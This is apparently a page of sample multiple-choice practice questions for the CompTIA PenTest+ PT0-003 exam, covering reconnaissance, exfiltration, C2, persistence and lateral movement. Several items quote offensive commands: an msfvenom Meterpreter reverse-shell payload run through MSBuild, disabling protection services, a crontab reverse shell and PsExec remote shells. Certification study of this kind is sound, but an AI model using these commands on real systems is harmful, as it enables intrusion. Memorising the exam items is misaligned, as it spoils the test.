Free PT0-003 Sample Questions — CompTIA PenTest+

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?

• A. Initiate a social engineering campaign
• B. Perform credential dumping
• C. Compromise an endpoint
• D. Share enumeration

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?

• A. OWASP MASVS
• B. OSSTMM
• C. MITRE ATT&CK
• D. CREST

A penetration tester needs to evaluate the security of example.com and gather stealthy information using DNS. Which of the following is the best tool for the tester to use?

• A. Nikto
• B. InSSIDer
• C. masscan
• D. Recon-ng

Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

• A. Use steganography and send the file over FTP
• B. Compress the file and send it using TFTP
• C. Split the file in tiny pieces and send it over dnscat
• D. Encrypt and send the file over HTTPS

A penetration tester sets up a C2 server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?

• A. ProxyChains
• B. Covenant
• C. PsExec
• D. sshuttle

A penetration tester attempts unauthorized entry to the company’s server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

• A. Plug spinner
• B. Bypassing
• C. Decoding
• D. Raking

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

• A. regsvr32 /s /n /u C:\evil.xml
• B. MSBuild.exe C:\evil.xml
• C. mshta.exe C:\evil.xml
• D. AppInstaller.exe C:\evil.xml

A penetration tester gains initial access to a Windows workstation on a client’s network. The tester wants to determine the next target but does not want to install software on the workstation. Which of the following is the best tool to list potential targets?

• A. mmc.exe
• B. Netstat
• C. Mimikatz
• D. explorer.exe
• E. CME

During an engagement, a penetration tester runs the following command against the host system: host -t axfr domain.com dnsl.domain.com Which of the following techniques best describes what the tester is doing?

• A. Zone transfer
• B. Host enumeration
• C. DNS poisoning
• D. DNS query

A penetration tester must identify vulnerabilities within an ICS that is not connected to the internet or enterprise network. Which of the following should the tester utilize to conduct the testing?

• A. Channel scanning
• B. Stealth scans
• C. Source code analysis
• D. Manual assessment

A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?

• A. curl https://api.shodan.io/shodan/host/search?key=&query=hostname:
• B. proxychains nmap -sV -T2
• C. for i in ; do curl -k $i; done
• D. nmap -sV -T2

Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

• A. Risk analysis
• B. Peer review
• C. Root cause analysis
• D. Client acceptance

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

• A. Preserving artifacts
• B. Reverting configuration changes
• C. Keeping chain of custody
• D. Exporting credential data

A penetration tester gains shell access to a Windows host. The tester needs to permanently turn off protections in order to install additional payload. Which of the following commands is most appropriate?

• A. sc config <svc_name> start=disabled
• B. sc query state= all
• C. pskill <pid_svc_name>
• D. net config <svc_name>

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?

• A. Privilege escalation
• B. DOM injection
• C. Session hijacking
• D. Cross-site scripting

A penetration tester gains access to a chrooted environment and runs service --status-all on a target host. The tester reviews the following output: [ + ] cron [ + ] dhcp [ - ] tomcat [ - ] xserver [ + ] ssh The only other commands that the tester can execute are ps, nc, tcpdump, and crontab. Which of the following is the best method to maintain persistence?

• A. Validate write access to crontab and add a reverse shell
• B. Capture credentials to use with tcpdump
• C. Scan the X11 server from the outside for unauthenticated connectivity
• D. Check access to the tomcat default manager page and use an LFI payload

A tester gains initial access to a server and needs to enumerate all corporate domain DNS records. Which of the following commands should the tester use?

• A. dig +short A AAAA local.domain
• B. nslookup local.domain
• C. dig afxr @local.dns.server
• D. nslookup -server local.dns.server local.domain *

While performing a penetration testing exercise, a tester executes the following command: PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe Which of the following best explains what the tester is trying to do?

• A. Test connectivity using PSExec on the server01 using CMD.exe.
• B. Perform a lateral movement attack using PsExec
• C. Send the PsExec binary file to the server01 using CMD.exe.
• D. Enable CMD.exe on the server01 through PsExec

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?

• A. Kiosk escape
• B. Arbitrary code execution
• C. Process hollowing
• D. Library injection

A penetration tester has been asked to conduct a blind web application test against a customer's corporate website. Which of the following tools would be best suited to perform this assessment?

• A. ZAP
• B. Nmap
• C. Wfuzz
• D. Trufflehog